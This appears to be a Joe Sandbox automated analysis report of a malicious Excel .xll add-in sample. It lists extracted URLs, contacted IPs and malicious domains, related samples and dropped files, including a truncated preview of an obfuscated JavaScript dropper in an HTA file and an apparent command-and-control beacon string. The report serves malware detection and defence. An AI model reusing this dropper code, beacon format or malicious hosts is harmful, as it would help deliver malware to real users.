                                                          http://srand04rf.ru/08powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://portal.office.com/account/?ref=ClientMeControlF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://graph.ppe.windows.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                		high
                                                                https://res.getmicrosoftkey.com/api/redemptioneventsF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://powerlift-frontdesk.acompli.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://tasks.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                  		high
                                                                  https://officeci.azurewebsites.net/api/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                    		high
                                                                    https://store.office.cn/addinstemplateF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmptrue
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://go.micropowershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmptrue
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                        		high
                                                                        https://globaldisco.crm.dynamics.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                          		high
                                                                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                            		high
                                                                            https://store.officeppe.com/addinstemplateF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://dev0-api.acompli.net/autodetectF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.odwebp.svc.msF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://api.powerbi.com/v1.0/myorg/groupsF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                              		high
                                                                              https://web.microsoftstream.com/video/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                		high
                                                                                https://graph.windows.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                  		high
                                                                                  https://dataservice.o365filtering.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://officesetup.getmicrosoftkey.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://analysis.windows.net/powerbi/apiF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                      		high
                                                                                      https://prod-global-autodetect.acompli.net/autodetectF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                        		high
                                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                          		high
                                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                            		high
                                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                              		high
                                                                                              https://ncus.contentsync.F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                		high
                                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                  		high
                                                                                                  http://weather.service.msn.com/data.aspxF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                    		high
                                                                                                    https://apis.live.net/v5.0/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                      		high
                                                                                                      http://srand04rf.rupowershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                        		high
                                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                          		high
                                                                                                          https://management.azure.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                            		high
                                                                                                            https://wus2.contentsync.F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://incidents.diagnostics.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                              		high
                                                                                                              http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDsnd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmptrue
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              https://clients.config.office.net/user/v1.0/iosF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                		high
                                                                                                                http://ocsp.sectigo.com00708_5355150121.xlltrue
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://insertmedia.bing.office.net/odc/insertmediaF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                  		high
                                                                                                                  https://o365auditrealtimeingestion.manage.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                    		high
                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                      		high
                                                                                                                      https://api.office.netF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                        		high
                                                                                                                        https://incidents.diagnosticssdf.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                          		high
                                                                                                                          https://asgsmsproxyapi.azurewebsites.net/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drtrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                            		high
                                                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0708_5355150121.xlltrue
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://entitlement.diagnostics.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                              		high
                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                		high
                                                                                                                                https://substrate.office.com/search/api/v2/initF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                    		high
                                                                                                                                    http://pesterbdd.com/images/Pester.png8powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmptrue
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://storage.live.com/clientlogs/uploadlocationF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://templatelogging.office.com/client/logF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://outlook.office365.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://webshell.suite.office.comF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://contoso.com/powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmptrue
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://management.azure.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorizeF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                  		high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  23.21.173.155
                                                                                                                                                  		elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                  		14618AMAZON-AESUSfalse
                                                                                                                                                  77.222.42.67
                                                                                                                                                  		sudepallon.comRussian Federation
                                                                                                                                                  		44112SWEB-ASRUtrue
                                                                                                                                                  8.211.241.0
                                                                                                                                                  		srand04rf.ruSingapore
                                                                                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                                  Private

                                                                                                                                                  IP
                                                                                                                                                  192.168.2.1

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:445958
                                                                                                                                                  Start date:08.07.2021
                                                                                                                                                  Start time:16:29:13
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 8m 20s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:0708_5355150121.xll
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:28
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLL@10/11@4/4
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 3% (good quality ratio 2.9%)
                                                                                                                                                  • Quality average: 88.5%
                                                                                                                                                  • Quality standard deviation: 21.2%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xll
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • HTTP Packets have been reduced
                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 13.88.21.125, 52.109.88.177, 52.109.12.21, 52.147.198.201, 20.82.210.154, 2.20.84.85, 51.103.5.186, 20.82.209.183, 95.101.22.134, 95.101.22.125, 40.112.88.60, 92.122.145.220
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  16:30:52API Interceptor50x Sleep call for process: powershell.exe modified
                                                                                                                                                  16:31:54API Interceptor91x Sleep call for process: snd32sys.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  23.21.173.155file.docGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  77.222.42.67triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  elb097307-934924932.us-east-1.elb.amazonaws.comOTzccW5OZg.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.226.23
                                                                                                                                                  ve88CBNzQZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.211.162
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.121.178
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  0706_1715044809783.docGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  niberius.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.78.40
                                                                                                                                                  4h2yLkN8DO.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  TejsR02giJ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  juON02msHS.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  B6tFTmWwt8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  Y0Cc092A1t.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  02ZEulFtpQ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.121.178
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  srand04rf.ruaCWkTdaR6G.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  0616_433887484261.docGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omsh.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omsh_.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  omh.dllGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208
                                                                                                                                                  0616_1338797754728.docGet hashmaliciousBrowse
                                                                                                                                                  • 8.209.119.208

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  SWEB-ASRUtriage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.42.67
                                                                                                                                                  jax.k.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_28522894410229.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_1488782409783.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_17568640710485.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_4618771472215.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  0526_1488782409783.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  jax.k.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  180000.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  jax.k.dllGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.52.246
                                                                                                                                                  HZHWEk01Ts.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.40.109
                                                                                                                                                  pT4uZ7ExfU.exeGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.40.139
                                                                                                                                                  bid,11.20.docGet hashmaliciousBrowse
                                                                                                                                                  • 77.222.55.176
                                                                                                                                                  AMAZON-AESUSOTzccW5OZg.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  ve88CBNzQZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                                                                                                                                                  • 3.223.125.168
                                                                                                                                                  FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                                                                                                                                                  • 3.223.125.168
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.245.108
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.220.248
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.173.155
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.245.108
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  0706_1715044809783.docGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  niberius.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.211.162
                                                                                                                                                  kURQyzESXZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 52.20.197.7
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  4h2yLkN8DO.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  aJuocCMPkL.exeGet hashmaliciousBrowse
                                                                                                                                                  • 34.225.31.148
                                                                                                                                                  TejsR02giJ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.190.106
                                                                                                                                                  CvRqP96UZw.exeGet hashmaliciousBrowse
                                                                                                                                                  • 100.25.107.227

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\Public\res32.hta
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8419
                                                                                                                                                  Entropy (8bit):5.163512636419693
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:/arm5dHoAR5V98geGR4qUg3fjRORjkSRQvRIPLBaGxmBWzMIAlPoP8L7T:/audHjf98lRqTP9UgYCGNaGxmNDlo8L3
                                                                                                                                                  MD5:71999A9D2F15E164C9B1FA926AA6444B
                                                                                                                                                  SHA1:C1FBD2B6458B474A208B6CC710951940C9290E5C
                                                                                                                                                  SHA-256:DA92436D2BBCDEF52B11ACE6E2E063E9971CEFC074D194550BD425305C97CDD5
                                                                                                                                                  SHA-512:298EAAB6D157E81BB738B1605285A0D14B05AE3656F1BBF72C4921C78B74BE7048B6744144469CB4EF48F4D4D233F794C366F192765A4F193C48B2DE2EFF4C27
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >....<html>..<body>....<script language="javascript">..var _0x8c86 = [.. 'W6RcUHHOW4dcUSocyZGj',.. 'WQBdGaO7WPqZW73dIq',.. 'W4pcLqKgyCkGaaHJW6O',.. 'W4hcOqzBnmo7W7HC',.. 'bWFcVWmEW4fSxsldUSoKWPW',.. 'WQxcUs0tWQG2W74',.. 'yfC1W6BcPef7W6ldJdu',.. 'WPVcJSoCnHyuWRNdHmkHWPbYWQK',.. 'W57cKCoKiCkGW5/cPZrZmW',.. 'WQxdHxzcW7WBW4BdVqnvWPm',.. 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O',.. 'zg5jW70/wJ1eW4lcOK/cHG',.. 'WPbyBmoUWPDzkblcJWHYcq',.. 'W7ldUt/cN8kdWPNcQty',.. 'aahdHuTHWP9DqG',.. 'WQdcMbi8WOSxW7q',.. 'W7iQnmo+DCkVzSoc',.. 'W5WHrvJcTmoFEw/cRSolcmo5mmoI',.. 'k8ofemkaW5PbzczLlcXQ',.. 'W7hdUMpdHCo8W5FcKHqqye9M',.. 'a8opcSkonCkOrq',.. 'WPb5WQVdV0hcQSk7W58',.. 'y1DLWRxcKe1oW6a',.. 'W53cKSoPk8oPW5dcLdzuiCk+',.. 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tm
                                                                                                                                                  C:\Users\Public\snd32sys.exe
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
